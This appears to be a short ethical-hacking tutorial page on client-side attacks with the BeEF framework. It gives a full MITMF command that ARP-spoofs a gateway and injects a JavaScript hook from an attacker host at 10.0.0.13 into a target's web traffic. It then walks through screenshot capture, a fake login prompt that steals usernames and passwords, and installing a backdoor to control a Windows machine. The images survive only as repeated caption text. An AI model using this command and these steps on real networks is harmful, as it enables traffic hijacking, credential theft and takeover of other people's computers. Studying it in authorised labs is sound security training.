CLIENT SIDE ATTACK - BeEF Framework

Hooking targets using MITMF

Tools: MITMF and BeEF

Start BeEF and execute the following commands:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hooks

Open any website in the browser on the target machine. You can find injected codes on the source page.

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

Open BeEF control panels and find the victim online browsers.

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

Then you can execute the commands to exploit victimized machines.

1. Get screenshots through Spyder Eys.

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

2. Get account name and password through Pretty Theft.

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

If a victim fills in the prompted login form, you can get username and password.

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

3. Gaining full control over Windows Target

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

Download and install the backdoor file on the target machine, then you can control this computer.

Ethical Hacking - GAINING ACCESS(23)-LMLPHP

05-15 21:12